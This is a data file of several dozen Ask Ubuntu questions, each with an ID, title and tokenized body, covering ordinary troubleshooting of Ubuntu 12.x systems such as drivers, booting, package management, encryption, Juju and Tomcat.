249264	nautilus is very slow when there are more than 40 items in a folder	nautilus is very slow when there are more than 40 items in a folder . it takes quite a long time to open the folder , about 5 seconds . basically in this folder i only have subfolders which have other folders . i have used nautilus in other distros and it was n't as slow as it is with ubuntu .
249267	creating setup of project made in monodevelop in ubuntu	i have made a demo project in monodevelop in ubuntu 12.10 that is using mysql as backend , i want to know how can i create a setup for this project . so that this setup can be run and installed on any linux system and user can use this project . please its urgent so give me quick response . regards rohit
249269	facebook issue in google chrome	i am using ubuntu 12.04 and google chrome version 23.0.1271.97 . my facebook chat bar is not rendering properly . when i scroll down my news feed the chat bar appears distorted . i have cleared the cache , and the problem still persists .
249271	dell wifi not working in inspiron 1545	i am new bee to ubuntu . and i have installed ubuntu 12.10 in dell inspiron 1545 but my wifi isnt working . from where do i can found driver ? or what should i do to work wifi ? thank you
249274	`` boot '' volume in 12.10 , only 5mb left	one of my other ubuntu machines keeps on giving the message the my boot volume is almost full with 5.5 mb left . i see there is answers for ubuntu 10.04 , but mine is 12.10 . i 've tried uninstalling software in ubuntu software center , but with no success , giving me a error in the uninstalling process , telling me that it ca n't be uninstalled . what do i do to rectify this ? please asssit me
249283	is there any `` windows-family-safety '' like feature available in ubuntu	is there any `` windows-family-safety '' like feature available in ubuntu . i tried opendns but it is not good at all . it is not able to stop nonsense images ( and at times videos ) brought up by search engine . while as `` windows-family-safety '' is really very smart .
249287	cronjob for security updates ?	i 'm having trouble creating a cronjob for automatic security updates on my ubuntu server 12.04 . i separated the security sources into a different file , and then did this from within a cronjob : path=/usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin apt-get -o dir : :etc : :sourcelist= '' security-sources.list '' -o dir : :etc : :sourceparts= '' - '' update -y apt-get -o dir : :etc : :sourcelist= '' security-sources.list '' -o dir : :etc : :sourceparts= '' - '' upgrade -y but i 'm getting all kind of weird messages in the log : example 1 : debconf : unable to initialize frontend : dialog debconf : ( term is not set , so the dialog frontend is not usable . ) debconf : falling back to frontend : readline debconf : unable to initialize frontend : readline debconf : ( this frontend requires a controlling tty . ) debconf : falling back to frontend : teletype dpkg-preconfigure : unable to re-open stdin : example 2 : unpacking replacement python-apport ... preparing to replace apport 2.0.1-0ubuntu15 ( using ... /apport_2.0.1-0ubuntu15.1_all.deb ) ... stop : job failed while stopping invoke-rc.d : initscript apport , action `` stop '' failed . example 3 : unpacking replacement dh-apparmor ... processing triggers for ureadahead ... processing triggers for man-db ... debconf : unable to initialize frontend : dialog debconf : ( term is not set , so the dialog frontend is not usable . ) debconf : falling back to frontend : readline debconf : unable to initialize frontend : readline debconf : ( this frontend requires a controlling tty . ) debconf : falling back to frontend : teletype processing triggers for shared-mime-info ... after receiving these logs in my email inbox , i logged in via ssh and saw this : 44 packages can be updated . 24 updates are security updates . so i guess it did n't work . any thoughts ?
249296	where are the logs for nfs file operations on the network ?	i have a ubuntu server 12.04 in my network and there are 20 workstations connected with this server through nfs . just now someone moved my share folder and files to somewhere else . now i already found my files , but i would like to know how to search or check in system log to track which workstation moved the files ? i wanted to find who moved the files , and prevent this from happening again . any way to check ? i tried /var/log/syslog but it does n't seem to contain the information i need .
249299	my user password is not accepted when connecting to a wireless network	when i installed my ubuntu 12.04 , i was never asked to enter the root password , therefore i assumed it was the same with my user password . now , when i want to connect to a wireless , my root password is required . at entering my user password i 'm told it 's the wrong one . how do i reset my root password ?
249300	aptitude ( apt-get ) always crashes	i 'm using ubuntu quantal . i 've recently updated and now my kernel is 3.5.0-23-generic . after upgrade my nvidia driver stopped working ... no problem ! i re-installed it and now it works . now i started my ubuntu , everything is just fine but : firefox keeps crashing ( always ! different timeframes , but always crashes , sometimes 10 sometimes 60 sec after run ) ; when i run apt-get install [ something ] i get this : $ sudo apt-get install curl reading package lists ... done when i run update software updater i get this : task can not be monitored or controlled the connection to the daemon was lost . most likely the background daemon crashed . details it seems that the daemon died . if it helps , i can confess that i had like 2-3 hard reset on my pc recently if you think that could cause such problem . entered recovery mode , selected fsck , waited a lot , i saw nothing , no change , no message , no progress , waited like 90 mins there , re-hard resetted . what do you suggest ? what could be the source of problem ? what should i check/fix ?
249301	ca n't install ubuntu on dell inspiron n5110	while installing ubuntu 12.10 on my dell inspiron a error occurs saying '' [ 7.063953 ] xor : automatically using best checksumming function '' and the installation does not proceed thereafter . kindly provide a solution to it as my installation is held up due to this .
249305	error message every time i start ubuntu	every time i start my computer i get a system error message , and when i click report problem this is shown : executablepath /usr/lib/evolution/evolution-calendar-factory package evolution-data-server 3.6.0-ubuntu3 ... unreportablereason you have some obsolete package versions installed . please upgrade the following packages and check if the problem still occurs : followed by a list of stuff . how do i update the packages , or rather what is 'calendar-factory ' and can i uninstall it , how ?
249307	how to prepare hdd for windows 8 install ?	i would like to keep my linux partitions and install windows 8 ( currently have xp ) to another partition . i tried it on another computer , where i had a linux partition , but did n't need to keep it . there was also an xp partition , but that was n't good enough for win8 . the windows 8 partitioner is ... not very good and only allowed me to create a new windows partition to install to after deleting all previous partitions . any ideas how i could prepare the partition setup in such a way that windows 8 would just use some of the ready made partitions and leave my ubuntu install alone ? ( sorry if dup , could only find ones for doing it the other way . ) update : the error i get is 0x803000024 . google returns results where the `` solution '' is always either to unplug all other drives ( i got this with only one hdd ) or remove all partitions ( which i 'm trying to avoid ) .
249310	how can i launch disk utility after installing it ?	i 'm trying to run gnome-disk-utility . but i can not seem to find it . sudo apt-get install gnome-disk-utility says its already installed , as does the software manager , however running gnome-disk-utility or palimpsest gets me command not found . i have tried reinstalling it ( sudo apt-get install -- reinstall , and sudo apt-get remove ... sudo apt-get install ) , which does no good . whereis : palimpsest return empty whereis : gnome-disk-utility returns /usr/share/gnome-disk-utility , a folder which contains nothing but *.ui files so , what has gone wrong , and how do i fix it ?
249314	how can i create a directory and change my working directory to the new directory ?	i 'm seeking a way to create directory and change my present working directory to newly created directory just by using a single command . how can i do this ? i.e instead of doing user @ computer : ~ $ mkdir newdirectory user @ computer : ~ $ cd newdirectory user @ computer : ~/newdirectory $ i want to do user @ computer : ~ $ **command** newdirectory user @ computer : ~/newdirectory $ what can the command be ?
249315	booting goes to grub	i installed ubuntu 12.04 on my packard bell dots notebook about 10 days ago downloading wubi from the ubuntu site . it has worked excellently since then ( except flash player problem which no amount of adobe downloads fixes ) . today it wo n't boot : when i choose ubuntu over windows i get gnu grub version 1.99-21 ubuntu3.7 minimal bash-like line editing is supported . for the first word tab list possible command completions . anywhere else tab lists possible device or file completions . grub > so i press tab and get possible commands are : [ authenticate background-color background-image badram boot break clear cofigfile continue cutmem echo export extract-entries-configfile extract-entries-source initrd imsmod linux loadfront loopback is lsfont menuentry normal normal-exit probe return search search.file search.fs-lable search.fs-uuid set setparams shift source submenu terminal-input terminal-output test unset grub > i am not technical at all and feel overwhelmed . i would happily try to download wubi again , but fear i will lose my excel and word worksheets . please could someone help . thank you
249319	my desktop is empty , i can only see the wallpaper . how can i fix it ?	i logged in to ubuntu and this is all i see . i opened up firefox through the terminal to get here . i remember swapping hard-drives that had windows 8 installed in it . and after putting back this hard drive i did n't let ubuntu start properly and restarted to log in to windows 8 .
249320	not able install paint tool in ubuntu 10.10	i am using ubuntu 10.10 , here i am not able install any paint tool . if i try to install some tool , it will show below message in a dialog box . requires installation of untrusted packages the action would require the installation of packages from not authenticated sources . please suggest some paint tool along with installation steps . also i have tried $ sudo apt-get update but it is showing like below ... err http : //in.archive.ubuntu.com maverick-updates/multiverse i386 packages 404 not found [ ip : 91.189.92.200 80 ] fetched 198b in 22s ( 9b/s ) w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/maverick/main/source/sources.gz 404 not found ...
249322	unlocking the disk ( sda5_crypt ) enter passphrase	i had installed ubuntu 12.10 with security key for enscrypting system hard disk which requires you to enter the passphrase before the login screen every time you boot your system ... i wanted to get rid of that security key so i used a command in terminal while my system was working fine but somehow the command disabled the logon to my system ( even after using the correct pw same is not opening ... i wanted ti reinstalll ubuntu through bootable usb but i think the security key for encrypting the hard disk is preventing the same ... i am just left with a useless laptop with me where i cant even install new os ... . what to do please help ... .how to disable the security key encryption passphrase or atleast how can i access or logon to my system please help ...
249324	what to select to back up from my system	i am using déjà dup and trying to back it up so i can try install a legacy driver and in case the install fails i can just restore . tried nepomuk but i dont understand not one bit of how it works so i searched on the internet and déjà dup was my best choice . i selected all directories from filesystem but i get errors , first was the file `` pagemap '' from /proc directory , removed it and now i get some errors that some other files were not possilbe to backup . so what directories to select from my filesystem so in case of a fail update or installment , to restore to its earlier state ? i 've broken enough filesystems and getting sick of it . i do n't need partition cloning tools , i sarched others solutions , i can not find one that works with my issues . example : like system restore does for windows .
249325	change micro plug to speaker plug	i 'm planning a little trip in bus with one of my friend , i 'd like to bring my netbook so we can watch movie during it . but i have only one plug for headphone and i do n't want to buy a jack multiplier . what i 'd like to do is mirror the speaker plug to the microphone plug , is this possible in ubuntu ? thank you !
249331	pdf editor to change font size	i have some e-books in pdf and kindle , but the font is too small to read on it . i want to make fonts larger in pdf files so that the pictures and other stuff in it is unchanged ( therefore i can not use calibre to convert it to another format ) . is there any editor for ubuntu that can manage to change font size in pdf files ?
249335	mac - install from usb - permission denied	i 'm following the official instructions for burning an ubuntu image on a usb stick from a macbook pro . step 8 when trying $ sudo dd if=/path/to/downloaded.img of=/dev/rdisk1 bs=1m i 'm getting ( after having typed my root password ) dd : /dev/rdisk1 : permission denied why is this happening ?
249338	where do you get a live cd for ubuntu ?	ive made some mistakes on my computer . i want to wipe in and install ubuntu . help please i really want a fresh computer .
249350	juju can not deploy services with maas	i would like deploy one or more charms with juju on maas environments ( without openstack ) . the environment of the maas controller is ubuntu 12.10 with 2 nics . one of the nic is connected to a external dhcp and the other is holding by the maas-dhcp and is connected to a switch with 2 client servers ( ubuntu 12.04 lts ) . the settings are as follows $ sudo vim /etc/network/interfaces auto em1 iface em1 inet static address [ out-ip ] netmask [ out-netmask ] gateway [ out-gateway ] dns-nameservers [ out-dns ] auto em2 iface em2 inet static address [ inner ip ] network [ inner network ] netmask [ inner netmask ] broadcast [ inner broadcast address ] $ sudo vim /etc/sysctl.conf uncomment net.ipv4.ip_forward=1 $ sudo vim /etc/rc.local /sbin/iptables -p forward accept /sbin/iptables -t nat -a postrouting -o eth0 -j masquerade $ sudo iptables -p forward accept $ sudo iptables -t nat -a postrouting -o eth0 -j masquerade $ sudo /etc/init.d/networking restart $ sudo dpkg-reconfigure maas-region-controller [ inner ip ] $ sudo dpkg-reconfigure maas-cluster-controller http : // [ inner ip ] :80/maas $ sudo vim /etc/maas/ephmeralss set arches= '' amd64 '' $ sudo maas createsuperuser $ sudo maas-impoart-pxe-files open web ui ( http : // [ inner ip ] /maas ) & press setting button & set cluster controllers $ sudo vim /var/share/preseeds/preseed-master âś open computer to let clients set to ready status ( do not press 'start node ' button ) check if nodes are all in ready status maas clients are all in ready status : setting juju environments.yaml juju bootstrap ( check if one of the node - > allocated to * ) open the allocated server to pxe boot and the setup a ubuntu after the installation juju status machines : 0 : agent-state : running dns-name : node-4487fc70b037 instance-id : /maas/api/1.0/nodes/node-xxx instance-state : unknown service { } when i try to deploy one charm ( for example mysql ) , the other client is booted and installed ubuntu . however , after the installation , the charm still was n't deployed . and i try : juju status machines : 0 : agent-state : running dns-name : node-4487fc70b037 instance-id : /maas/api/1.0/nodes/node-64248652-6a9b-11e2-9347-842b2b6a17a3/ instance-state : unknown 1 : agent-state : not-started dns-name : node-0025b31884f5 instance-id : /maas/api/1.0/nodes/node-011c5b14-6a9d-11e2-9c04-842b2b6a17a3/ instance-state : unknown services : mysql : charm : cs : precise/mysql-15 relations : { } units : mysql/0 : agent-state : pending machine : 1 public-address : null i also checked /var/log/juju/machine-agent.log of machine 1 ( the non-started machine ) and it shows that 2013-01-30 01:19:58,444 : twisted @ error : unhandled error in deferred : 2013-01-30 01:19:58,454 : twisted @ error : unhandled error traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 1181 , in unwindgenerator return _inlinecallbacks ( none , gen , deferred ( ) ) file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 1039 , in _inlinecallbacks result = g.send ( result ) file `` /usr/lib/python2.7/dist-packages/juju/agents/base.py '' , line 238 , in startservice yield self.connect ( ) file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 1181 , in unwindgenerator return _inlinecallbacks ( none , gen , deferred ( ) ) -- - < exception caught here > -- - file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 1039 , in _inlinecallbacks result = g.send ( result ) file `` /usr/lib/python2.7/dist-packages/juju/agents/base.py '' , line 208 , in connect self.config [ `` zookeeper_servers '' ] ) file `` /usr/lib/python2.7/dist-packages/txzookeeper/retry.py '' , line 302 , in connect return self.client.connect ( *args , **kw ) file `` /usr/lib/python2.7/dist-packages/txzookeeper/client.py '' , line 468 , in connect self._servers , callback , self._session_timeout ) zookeeper.zookeeperexception : could not internally obtain zookeeper handle i wait for one day and it keeps pending . the machine 1 is also remaining on not-started . i also checked to ssh two clients that they are quite ok . however , i can not use juju ssh 1 to connect to the client . i really do n't know what to do . please help me .
249352	apt-get wo n't handle package locking made in synaptic	in synaptic i locked skype to version 2.2.0.35 and the package manager is correctly ignoring newer version ( it does n't select skype upgrade ) . on the contrary , apt-get upgrade will propose the upgrade . i know i could lock the package with echo `` skype hold '' | sudo dpkg -- set-selections , but i 'd like to have synaptic changes being reflected in apt-get
249354	is there any plan to merge `qt-components-ubuntu` into official qt/qml ?	is there any plan to merge qt-components-ubuntu into official qt/qml ? is it ongoing already ? it 's quite sad that ubuntu forked qt . i want to use qml to build a desktop app , and widgets introduced in qt-components-ubuntu are what i need .
249356	`` error loading operating system '' when booting from usb to install 12.10 64bit	i have just built a new computer i 've never installed linux on a computer before . booting from my usb come up with `` error loading operating system '' . i am trying to install it on my new 64gb ssd , it has nothing on it . looked through some of the previous forums but most of theirs have been because they have already got windows already installed on it . could someone please help ?
249363	my ubuntu system is asking login again and again when i even entered the correct login details ?	i am using ubuntu 12.04 in dell desktop . i am unable to login into my desktop . when i enter my login details its just coming again to login page without entering into my dashboard ? please help me ...
249366	how to remove two forward slashes in a comment with sed	i have a configuration file and i want to replace a line containing a specific string , lets say test : file.conf aaa bbb ccc // test ddd // test my line of code is not working , i 'm new to sed . sed -i `s # ^// [ \t ] test # test # g' some guidance ?
249367	how to fix ubuntu after accidentally uninstalling many packages ?	i accidentally removed all the packages starting with the name jpeg with : sudo apt-get remove jpeg* this screwed up a lot of things , removed unity , firefox , flash player etc . i somehow managed to recover the desktop and unity but then a lot of things are still buggy . for example .rpm files and .tag.gz just wo n't open up at all . what i want is a way to fix everything that 's amiss . something that is the equivalent of a 'repair installation ' with a windows disc . any tips , anyone ?
249370	file sharing between ubuntu vm and windows 7	i 've got ubuntu 12.04 running as guest in a virtualized vmware workstation 9 session on a windows 7 host . the windows machine shares a folder with the ubuntu machine via cifs and the ubuntu machine mounts the shared folder automatically on startup thanks to this line in /etc/fstab file : // < remotehost > / < sharename > < localsharepath > cifs soft , uid=1000 , username= < remoteusername > , password= < remotepassword > 0 0 file sharing through the mount works fine until there is a need to resume the ubuntu virtual machine after it was paused or to restore it from a snapshot . this typically happens after the windows host machine was restarted or started after a nightly shutdown . after ubuntu is resumed , the folder that contains the mount of the shared folder does not list any items . the nautilus window just hangs for a long time completely empty with `` loading ... '' in its bottom right corner , despite of the fact that there are lots of other folders and files in that folder to show . restarting the ubuntu machine does help but it is n't practical : ubuntu takes forever to shut down , it just hangs on one of those final command line screens desperately waiting for something ( when the mount is accessible , there is no such problem ) . for now , the only option is to power off ubuntu brutally and then power it back on in order to be able to access the mount , which , of course , is not practical either . my guess is that when some cifs/samba communication parameters get changed ( after windows is restarted ) the restored image of the ubuntu virtual machine somehow fails to catch up . even with vmware tools installed on the ubuntu machine , the vmware 's shared folder feature , which could serve as an alternative , does n't work for ubuntu 12 ( and many other linux distros ) . but even if it did , cifs/samba sharing would still be required for file sharing with other virtual machines .
249371	ntfs d : partition windows 7	i have similar problem , i installed ubuntu 12.10 on top of windows 7 , i have all my files on a logical partition d : could n't access that partition from ubuntu . during installation i choose to encrypt the hard drive . how do i get my d : files on windows previously ? here are some useful information about my system : blkid /dev/sda1 : uuid= '' fc91920a-ede7-43fb-a23a-17fb4c1537b0 '' type= '' ext2 '' /dev/sda5 : uuid= '' 6a5f9794-a72a-4c6c-bac0-66222cf38934 '' type= '' crypto_luks '' /dev/mapper/sda5_crypt : uuid= '' auw1wk-yeag-v5wz-phij-b2vq-1eax-08fh2l '' type= '' lvm2_member '' /dev/mapper/ubuntu-root : uuid= '' 9e03b2aa-2dfe-4b76-84f1-b8428272af21 '' type= '' ext4 '' /dev/mapper/cryptswap1 : uuid= '' b778a1db-839f-45ef-9ee6-a9877b6054f4 '' type= '' swap '' fdisk -l disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000e65a7 device boot start end blocks id system /dev/sda1 * 2048 499711 248832 83 linux /dev/sda2 501758 976771071 488134657 5 extended /dev/sda5 501760 976771071 488134656 83 linux disk /dev/mapper/sda5_crypt : 499.8 gb , 499847790592 bytes 255 heads , 63 sectors/track , 60769 cylinders , total 976265216 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x2c677a96 device boot start end blocks id system disk /dev/mapper/ubuntu-root : 495.6 gb , 495649292288 bytes 255 heads , 63 sectors/track , 60259 cylinders , total 968065024 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x95cabf50 device boot start end blocks id system disk /dev/mapper/ubuntu-swap_1 : 4143 mb , 4143972352 bytes 255 heads , 63 sectors/track , 503 cylinders , total 8093696 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x4ca7eb06 disk /dev/mapper/ubuntu-swap_1 does n't contain a valid partition table disk /dev/mapper/cryptswap1 : 4143 mb , 4143972352 bytes 255 heads , 63 sectors/track , 503 cylinders , total 8093696 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xadfe8bcb device boot start end blocks id system ls -la /dev/mapper/ total 0 drwxr-xr-x 2 root root 140 jan 30 12:15 . drwxr-xr-x 18 root root 4400 jan 30 12:35 .. crw -- -- -- - 1 root root 10 , 236 jan 29 16:16 control lrwxrwxrwx 1 root root 7 jan 30 11:46 cryptswap1 - > ../dm-3 lrwxrwxrwx 1 root root 7 jan 30 12:02 sda5_crypt - > ../dm-0 lrwxrwxrwx 1 root root 7 jan 30 11:46 ubuntu-root - > ../dm-1 lrwxrwxrwx 1 root root 7 jan 30 11:46 ubuntu-swap_1 - > ../dm-2 lvmdiskscan /dev/ram0 [ 64.00 mib ] /dev/mapper/sda5_crypt [ 465.52 gib ] lvm physical volume /dev/ram1 [ 64.00 mib ] /dev/sda1 [ 243.00 mib ] /dev/ubuntu/root [ 461.61 gib ] /dev/ram2 [ 64.00 mib ] /dev/ubuntu/swap_1 [ 3.86 gib ] /dev/ram3 [ 64.00 mib ] /dev/mapper/cryptswap1 [ 3.86 gib ] /dev/ram4 [ 64.00 mib ] /dev/ram5 [ 64.00 mib ] /dev/sda5 [ 465.52 gib ] /dev/ram6 [ 64.00 mib ] /dev/ram7 [ 64.00 mib ] /dev/ram8 [ 64.00 mib ] /dev/ram9 [ 64.00 mib ] /dev/ram10 [ 64.00 mib ] /dev/ram11 [ 64.00 mib ] /dev/ram12 [ 64.00 mib ] /dev/ram13 [ 64.00 mib ] /dev/ram14 [ 64.00 mib ] /dev/ram15 [ 64.00 mib ] 1 disk 20 partitions 1 lvm physical volume whole disk 0 lvm physical volumes pvscan pv /dev/mapper/sda5_crypt vg ubuntu lvm2 [ 465.52 gib / 48.00 mib free ] total : 1 [ 465.52 gib ] / in use : 1 [ 465.52 gib ] / in no vg : 0 [ 0 ]
249376	read-only sd cards	i 've got an icybox usb hub/card reader combo in my computer , running ubuntu 12.10 . it 's got an issue with sd cards . it always mounts them read-only , regardless of the write-lock switch . this is observed across many sd cards that otherwise work , and crucially occurs for a microsd in an adapter , where the microsd was fine in the microsd slot in the reader . anyone got any ideas as to what 's going on and how i can fix it ?
249378	how to fix `` list of sources could not be read . '' error ?	i am unable to install or update software via the ubuntu software center , or via the terminal . i get the following error : e : type 'lude ' is not known on line 2 in source list /etc/apt/sources.list.d/tiheum-equinox-precise.list e : the list of sources could not be read .
249380	how do i restore previous packages after a failed update ?	i recently upgraded my 12.10 installation on my alienware m11x laptop , and lost both my network cards ( wired and wireless network ) . how do i get them back ? i would like a solution that does n't involve going to my work computer and downloading files on a usb stick to get on the laptop ; instead i would like to see a solution where the partial upgrade is reverted back to what was functioning before , so i can retry the upgrade . the upgrade was aborted halfway through because the network went down and/or because the laptop was running out of batteries . i am not sure , but i do n't think the upgrade was a problem in itself , rather the problem was that the upgrade was aborted in the middle of it all . output of lspci -nn includes : 0d:00.0 network controller [ 0280 ] : intel corporations centrino wireless-n 1000 [ 8086:0083 ] 07:00.0 ethernet controller [ 0200 ] : atheros communications inc. ar8151 v2.0 gigabit ethernet [ 1969:1083 ] sudo ifconfig wlan0 up yields : wlan0 : error while getting interface flags : no such device /etc/network/interfaces contains lo but nothing else ( only loopback network device ) lshw -class network returns : *-network unclaimed ... some info on ar8151 ethernet controller ... *-network unclaimed ... some info on wireless controller ... rfkill list all returns nothing at all
249382	can not start tomcat6 server in ubuntu	i first downloaded open-jdk with : sudo apt-get install openjdk-6-jdk when i write java -version i get : java version `` 1.7.0_09 '' openjdk runtime environment ( icedtea7 2.3.4 ) ( 7u9-2.3.4-0ubuntu1.12.10.1 ) openjdk 64-bit server vm ( build 23.2-b09 , mixed mode ) and when i write javac -version i get : javac 1.6.0_24 then i downloaded tomcat 6 from http : //www.poolsaboveground.com/apache/tomcat/tomcat-6/v6.0.36/bin/apache-tomcat-6.0.36.tar.gz i unzipped the file , and tried to run sudo bash startup.sh in the /bin directory . then i get this message : using catalina_base : /home/apache-tomcat-6.0.36 using catalina_home : /home/apache-tomcat-6.0.36 using catalina_tmpdir : /home/apache-tomcat-6.0.36/temp using jre_home : /usr using classpath : /home/apache-tomcat-6.0.36/bin/bootstrap.jar i have also tried to install tomcat as a service with sudo apt-get install tomcat6 then i get the message : sudo apt-get install tomcat6 reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : ... use 'apt-get autoremove ' to remove them . suggested packages : tomcat6-docs tomcat6-admin tomcat6-examples tomcat6-user libtcnative-1 the following new packages will be installed : tomcat6 0 upgraded , 1 newly installed , 0 to remove and 28 not upgraded . need to get 0 b/30.2 kb of archives . after this operation , 258 kb of additional disk space will be used . preconfiguring packages ... selecting previously unselected package tomcat6 . ( reading database ... 85488 files and directories currently installed . ) unpacking tomcat6 ( from ... /tomcat6_6.0.35-5_all.deb ) ... processing triggers for ureadahead ... setting up tomcat6 ( 6.0.35-5 ) ... * starting tomcat servlet engine tomcat6 [ fail ] invoke-rc.d : initscript tomcat6 , action `` start '' failed . when i run this : $ sudo /etc/init.d/tomcat6 start * starting tomcat servlet engine tomcat6 [ fail ] the server just wo n't start . i set it up exactly the same in windows , running startup.bat , and it worked . anyone got a clue what is the problem ? there are no error messages .
249385	why is eclipse juno running very slow ?	hey guys i am developing android apps on eclipse and its running very slow . so slow that i am not able to program properly because of this thing . e.g - when i click on graphical layout in xml it takes around 10 secs to shift from graphical to xml code . the same is happening in java code too . i am running intel core 2 duo 1.83 ghz with 3gb ram . also i have provided 3gb as swap drive ( logical not primary )
249387	df -h - used space + avail free space is less than the total size of /home	as the output of df -h shows here , something is eating up 5gb of free space . so , it 's not available to use . i 'm also noticing sometimes that the hard disk gets filled up to 100 % sometimes . so , i had to restart the machine or delete some unncessary files . only noticed these in /home partition . do n't know whether these two are related , but appreciate if anyone can put some insight into this . $ df -h filesystem size used avail use % mounted on /dev/sda8 100g 92g 2.7g 98 % /home
249392	compiz configuration with gsettings for focus policy	it is to my understanding that there are methods to learn of compiz configuration with regard to its focus policy as followings . ( perhaps there are more , but i have yet to discovered. ) gconftool-2 gconftool-2 get /apps/compiz/general/allscreens/options/click_to_focus using ccsm my question is , does compiz provide supported schemas by which gsettings could as well be used to query its focus policy ? i know that in either mutter or metacity we can use gsettings get org.gnome.desktop.wm.preferences focus-mode i simply wish to query a value for it in a system that is already ported for gsettings . thank you . : }
249393	what are the corresponding commands in ubuntu ?	this link : https : //community.openvpn.net/openvpn/wiki/buildingopenvpn-gui provides the following instructions : $ autoreconf -v $ ./configure -- with-crypto-includes=/c/openssl/include -- with-crypto-lib=/c/openssl/lib $ make as i 'm new to linux and ubuntu , i would appreciate it if someone could show me the corresponding `` sudo '' commands . i understand that in ubuntu , there 's no such thing as a c : \ drive . thanks in advance . -- -- update -- -- thank you guys for your help and suggestions . i know now that i do n't need to sudo to issue the above commands . i 'd appreciate it if someone could explain to me what the `` c '' in `` /c/openssl/include '' and `` /c/openssl/lib '' stand for ? does `` c '' in those statements stand for the c : drive or c compiler ?
249395	why ca n't i read encrypted dvds after installing libdvdread4 ?	i have already installed libdvdread4 and i still get the message : could not read dvd . this may be because the dvd is encrypted and a dvd decryption library is not installed .
249397	plymouth update is called for every init script	i use a customized plymouth script that uses the plymouth update trigger to display messages on the screen while booting . since i migrated from ubuntu 10.10 to 12.04 i get a lot of extra messages . i found out that every script in /etc/init/* is pushed to plymouth . i do not want that . is there a way to remove those ?
249401	unity-tweak-tool is not starting from ubuntu dash	i 've installed the tool unity-tweak-tool , but i could n't start it from dash . i can launch it from terminal though . please advise how can i make the dash icon work ?
249403	custom command to open vlc with some options	i am trying to create a script to run vlc to play ( or queue if a playlist is already present ) some videos . so far in my ~/bin/ folder i have created a file `` myvlc '' with the following command : # ! /usr/bin/env bash vlc -- http-port 54444 % u this works as a command if i set it as launcher command in an icon , but it doesnt work if from the command line i type : myvlc ~/videos/some\ folder/video.avi how can i modify this bash script and make it work ?
249404	script to change permission on content , and move files to other folder	i have a program that downloads some files . i want those files to automatically change permissions to 755 , and get moved to another folder on my system . i want this to autorun every hour . is this possible ? i 'm not good at scripting , but i 'm pretty good in terminal . my system is an ubuntu server 12.04 .
249405	may i use ubuntuone to share files from my business ?	me ( and my partners ) have developed a point & click adventure game . it is a game that runs on windows ( and hopefully linux.. it is still being tested ) and the installer is about 330m . the game is free , and thus , have no budget . but anyway we want to be able to distribute it through the new windows 8 store . so , we were thinking about uploading the game to ubuntu one and link from everywhere directly to this file for free download . may i use ubuntuone this way or is it only for personal use ? is there a limit about the downloads or bandwidth used for download ?
249411	same folders in two drives	i re-installed ubuntu 8.10 on my system to dual boot with windows xp . previously ubuntu was in sda9 . then i tried to install ubuntu 11.04 from a bootable cd . it went through all preliminaries . i selected sda9 for installing ubuntu 11.04 . it proceeded with installation for some time and then it crashed . the reason given was that my cd drive was defective and hence it has crashed . however when it was installing , i observed that a new partition sda10 was getting created without my permission or authorization . on subsequent restarts , grub error 7 was reported and computer was not booting . then i re-installed ubuntu 8.10 , but on sda10 and not sda9 because sda9 , sda11 and sda8 were titled as swap partitions . sda10 was showing only 343 mb as used and the available space was 7800 mb . now , ubuntu is working alright , but windows explorer is showing two drives g : drive and l : drive having the same folders and files . ubuntu was there in l : drive previously . but i can not see any ubuntu folders such as /boot , /bin etc . where is it stored and how to eliminate the duplicate folder problem ? would i have lost any files/folders even though i took all the precautions to install ubuntu in sda10 , which was not there before ?
249413	unity launcher does n't show all the applications when i put the cursor on it ( ubuntu quantal )	when i put the cursor on unity launcher ( i 'm using ubuntu 12.10 ) to see all the applications , it does n't move in a vertical way but it remains immovable . the launcher works only if i put the cursor on the center of the icon application , but if i move the cursor on the left screen it does n't work well . to be honest , i 've added some compiz effects to ubuntu ( like cube , shaking windows , animations , etc ) and , if i 'm not wrong , this issue has begun from then on , but i 've done the same things on ubuntu 12.04 and i never had this problem ... am i forced to reset unity maybe ? here you are a screenshot which shows you what i mean ( note the cursor below ) . thank you very much in advance .
249424	when will gcc support c++11 regex_token_iterator ?	when will gcc support for c++11 regex_token_iterator ? some of regex seems to be implemented , but the token iterator is not supported yet in my 32-bit ubuntu/linaro ( version 4.7.2-4precise1 ) installation . any idea when this will be available ?
249425	what guarantees does ubuntu provide concerning binary compatibility across releases ?	i know generally the answer is `` use a ppa '' , but separate from this ... what is the ubuntu policy on compatibility across versions of ubuntu for a given architecture ? for example , if a binary in a package is built on 10.04 lts and the same libraries exist in ubuntu 12.04 lts , does ubuntu guarantee compatibility ? are there any guidelines for isvs ? i did search quite a bit and find references about compatibility to lsb , other distributions , etc . i 'm not finding a document that describes across ubuntu release versions .
